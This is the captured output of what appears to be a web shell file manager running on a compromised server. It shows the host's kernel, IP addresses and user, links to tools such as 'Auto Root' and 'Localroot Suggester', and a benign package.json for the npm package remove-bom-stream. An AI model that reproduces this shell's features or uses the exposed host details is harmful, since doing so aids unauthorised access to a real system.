Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.144.226.0
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
node_modules /
remove-bom-stream /
Delete
Unzip
Name
Size
Permission
Date
Action
node_modules
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
LICENSE
1.14
KB
-rw-rw-r--
2022-08-30 11:49
README.md
1.79
KB
-rw-rw-r--
2022-08-30 11:49
index.js
1008
B
-rw-rw-r--
2022-08-30 11:49
package.json
1.19
KB
-rw-rw-r--
2022-08-30 11:49
Save
Rename
{ "name": "remove-bom-stream", "version": "1.2.0", "description": "Remove a UTF8 BOM at the start of the stream.", "author": "Gulp Team <team@gulpjs.com> (http://gulpjs.com/)", "contributors": [ "Blaine Bublitz <blaine.bublitz@gmail.com>" ], "repository": "gulpjs/remove-bom-stream", "license": "MIT", "engines": { "node": ">= 0.10" }, "main": "index.js", "files": [ "LICENSE", "index.js" ], "scripts": { "lint": "eslint index.js test/ && jscs index.js test/", "pretest": "npm run lint", "test": "mocha --async-only", "cover": "istanbul cover _mocha", "coveralls": "npm run cover && istanbul-coveralls" }, "dependencies": { "safe-buffer": "^5.1.0", "remove-bom-buffer": "^3.0.0", "through2": "^2.0.3" }, "devDependencies": { "buffer-equal": "^1.0.0", "eslint": "^1.10.3", "eslint-config-gulp": "^2.0.0", "expect": "^1.20.2", "istanbul": "^0.4.3", "istanbul-coveralls": "^1.0.3", "jscs": "^2.4.0", "jscs-preset-gulp": "^1.0.0", "mississippi": "^1.3.0", "mocha": "^3.2.0", "stream-chunker": "^1.2.8" }, "keywords": [ "bom", "remove", "utf8", "streaming", "stream" ] }